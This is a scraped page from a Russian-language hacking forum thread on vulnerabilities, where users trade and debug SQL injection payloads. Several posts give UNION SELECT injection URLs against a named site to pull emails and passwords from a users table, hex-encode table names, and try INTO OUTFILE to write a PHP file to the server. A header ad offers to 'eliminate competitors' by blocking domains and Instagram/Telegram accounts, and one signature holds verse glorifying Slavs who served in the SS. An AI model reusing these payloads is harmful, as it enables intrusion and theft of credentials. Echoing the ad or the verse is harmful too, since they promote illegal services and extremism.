УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1824 из 2438

1824

Опции темы

Поиск в этой теме

Опции просмотра

#18231

01.10.2011, 18:46

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от Ulitko

Ulitko said:
подскажите запрос к mssql, чтобы вывести определенные столбцы в отдельный текстовик

exec master..sp_makewebtask "путь_до_файла",

"select имя_столбца from имя_таблицы"

#18232

01.10.2011, 18:56

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

попробывал этот запрос. Выдает ошибку

(Could not find stored procedure 'master..sp_makewebtask'.)

#18233

01.10.2011, 18:58

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

Провел на форуме:
1180165

Репутация: 11

запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+

в ответ ошибка supplied argument is not a valid MySQL result resource in

Подскажите где она?

#18234

01.10.2011, 19:16

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Возможен такой вариант, что просто отказывает в выводе таблиц?
мой запрос выглядел по моему правильно
Ошибка
Unknown column 'users' in 'where clause'

users захекси..

#18235

01.10.2011, 19:16

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

users хексни!

0x7573657273

http://steelmuscle.org/hex.php

#18236

01.10.2011, 19:16

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от wkar

wkar said:
запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+
в ответ ошибка supplied argument is not a valid MySQL result resource in
Подскажите где она?

во первых получишь ошибку

Unknown column '' in 'field list' (указывать надо в прямых ковычках)

во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` )

в третих нельзя захексить путь

#18237

01.10.2011, 19:17

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

Цитата:

Сообщение от Ulitko

Ulitko said:
попробывал этот запрос. Выдает ошибку
(Could not find stored procedure 'master..sp_makewebtask'.)

забыл добавить, пытаюсь сделать все из под шелла

#18238

01.10.2011, 19:57

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Цитата:

Сообщение от None

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273--

это шутка????from+0x7573657273

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,pa ssword),4,5,6+fr om+users+--+

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7 573657273+--+

как то так что бы тебе понятнее было что ты пытаешься сделать

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

#18239

01.10.2011, 20:10

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Цитата:

Сообщение от OxoTnik

OxoTnik said:
В моем запросе мне уже должен показаться логин и пароль, в твоем он показывает мне колонки которые я уже знаю

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом?????????

в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос

#18240

01.10.2011, 21:09

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Ошибся, он вывел мне логин пасс,спасибо"
только не совсем понятно что делает
concat_ws(0x3a,email,password)
спс все обьяснили
выражаю благодарность
HAXTA4OK

concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.

Страница 1824 из 2438

1824

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход